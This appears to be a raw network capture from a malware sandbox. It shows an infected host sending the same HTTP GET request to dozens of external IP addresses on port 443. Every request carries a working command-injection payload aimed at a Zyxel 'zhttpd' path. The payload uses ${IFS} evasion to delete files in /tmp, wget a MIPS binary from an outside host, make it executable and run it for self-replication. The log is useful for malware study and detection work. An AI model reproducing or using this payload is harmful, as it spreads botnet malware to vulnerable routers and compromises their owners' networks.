                                                Jan 12, 2024 18:24:31.737204075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3344192.168.2.1359054114.12.246.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737250090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3345192.168.2.1344916180.147.37.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737302065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3346192.168.2.134249066.165.182.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737335920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3347192.168.2.133477472.133.59.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737381935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3348192.168.2.13377288.241.13.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737404108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3349192.168.2.134205442.249.241.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737453938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3350192.168.2.134040475.138.226.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737514019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3351192.168.2.1337730160.227.104.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737538099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3352192.168.2.1358124171.55.110.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737574100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3353192.168.2.1342036189.73.133.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737622023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3354192.168.2.135127642.196.1.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737662077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3355192.168.2.1337600169.109.49.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737689018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3356192.168.2.135800261.41.76.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737735987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3357192.168.2.1336912198.235.138.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737778902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3358192.168.2.133645675.227.84.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737813950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3359192.168.2.1346492100.232.69.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737854004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3360192.168.2.134433687.89.50.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737895966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3361192.168.2.1339178130.75.170.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737915039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3362192.168.2.1340014223.2.189.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737958908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3363192.168.2.1347462111.24.170.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738009930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3364192.168.2.135078093.3.242.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738050938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3365192.168.2.1336464180.206.134.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738070965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3366192.168.2.1356328135.39.50.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738106012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3367192.168.2.136009880.34.39.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738147974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3368192.168.2.133538682.98.20.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738198996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3369192.168.2.1335418150.50.22.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738233089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3370192.168.2.134896832.131.177.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738281012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3371192.168.2.1334294124.105.235.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738326073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3372192.168.2.1348836190.107.197.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738377094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3373192.168.2.1357494153.17.190.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738409042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3374192.168.2.1341840199.128.242.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738440990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3375192.168.2.1336230157.148.121.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738492966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3376192.168.2.134279640.128.44.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738523960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3377192.168.2.135792854.93.22.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738554955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3378192.168.2.135417870.250.17.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738588095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3379192.168.2.134636039.219.178.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738610983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3380192.168.2.1345596173.252.192.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738661051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3381192.168.2.1355084112.58.17.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738698006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3382192.168.2.1337166116.113.248.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738729954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3383192.168.2.135081259.7.144.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738770008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3384192.168.2.1335870220.12.66.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738791943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3385192.168.2.1339426169.33.141.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738851070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3386192.168.2.1344630106.109.140.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738884926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3387192.168.2.1342134116.107.62.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738909006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3388192.168.2.1357304126.53.218.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.738951921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3389192.168.2.1348170218.152.224.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739001036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3390192.168.2.134625679.142.215.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739032984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3391192.168.2.135355860.35.100.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739070892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3392192.168.2.134221858.92.212.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739121914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3393192.168.2.134673212.63.88.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739141941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3394192.168.2.1342004196.245.170.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739187002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3395192.168.2.133390454.101.244.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739226103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3396192.168.2.1347260120.235.49.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739272118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3397192.168.2.1346334202.67.109.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739306927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3398192.168.2.134558432.175.91.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739353895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3399192.168.2.13595521.65.101.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739381075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3400192.168.2.135526486.229.117.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739418030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3401192.168.2.135923886.204.47.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739454031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3402192.168.2.1350354157.202.252.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739496946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3403192.168.2.1350072217.253.50.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739509106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3404192.168.2.134271886.209.186.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739561081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3405192.168.2.134063031.65.83.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739605904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3406192.168.2.1352398207.8.237.96443
                                                TimestampBytes transferredDirectionData
